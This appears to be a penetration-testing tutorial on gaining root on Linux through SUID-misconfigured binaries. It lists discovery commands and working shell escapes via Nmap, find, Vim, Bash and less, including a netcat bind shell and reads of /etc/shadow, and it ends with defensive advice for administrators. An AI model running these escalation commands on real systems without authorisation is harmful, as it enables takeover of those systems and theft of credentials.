SUID (Set User ID) is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner. There are plenty of reasons why a Linux binary can have this type of permission set. For example the ping utility require root privileges in order to open a network socket but it needs to be executed by standard users as well to verify connectivity with other hosts.

However some of the existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission. Known Linux executables that can allow privilege escalation are:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

The following commands can discover all the SUID executables that are running on the system. More specifically the commands will try to find files in the / directory owned by the user root that have the SUID permission bits, print them and then redirect all errors to /dev/null in order to list only the binaries that the user has permissions to access.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Discovery of SUID Executables

Discovery of SUID Executables

All of the binaries above will executed with root privileges since they contain the “s” in their permissions and they are owned by the root user.

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
SUID Executable - Nmap

SUID Executable – Nmap

Nmap

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands.  Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges.

nmap -V
Nmap Version Identification

Nmap Version Identification

The interactive mode can start by executing Nmap with the parameter “interactive

nmap --interactive
Nmap - Interactive Mode

Nmap – Interactive Mode

The following command will give an elevated shell.

nmap> !sh
sh-3.2# whoami
root
Root Shell via SUID Nmap

Root Shell via Suid Nmap Binary

Alternatively there is a Metasploit module which performs privilege escalation via SUID Nmap binaries.

exploit/unix/local/setuid_nmap

Find

The utility find can be used to discover stored on the system. However it is the ability to execute commands. Therefore if it is configured to run with the SUID permission all the commands  that will executed through find will be executed as root.

touch pentestlab
find pentestlab -exec whoami \;
Find Command Execution

Find Command Execution

Since the majority of the Linux operating system have netcat installed it is possible to upgrade the elevated command execution into a root shell.

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
Run Netcat via Find

Run Netcat via Find

Connecting into the opened port will give a root shell.

netcat 192.168.1.189 5555
id
cat /etc/shadow
Root Shell via Find

Root Shell via Find

Vim

The main use of Vim is to be text editor. However if it runs as SUID it will inherit the permission of the root user and therefore it could read all files on the system.

vim.tiny /etc/shadow
Vim - Reading Root Files

Vim – Reading Root Files

Further root activities can be done by running a shell through Vim.

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
Vim - Root Shell

Vim – Root Shell

Bash

The following command will open a bash shell as root.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Bash - Root Shell

Bash – Root Shell

Less

The utility Less can also execute an elevated shell. The same principle applies and for the More command.

less /etc/passwd
!/bin/sh
Less - Root Shell

Less – Root Shell

Conclusion

Performing privilege escalation by misconfigured SUID executables is trivial. Therefore administrators should evaluate all the SUID binaries and whether they need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.

Advertisements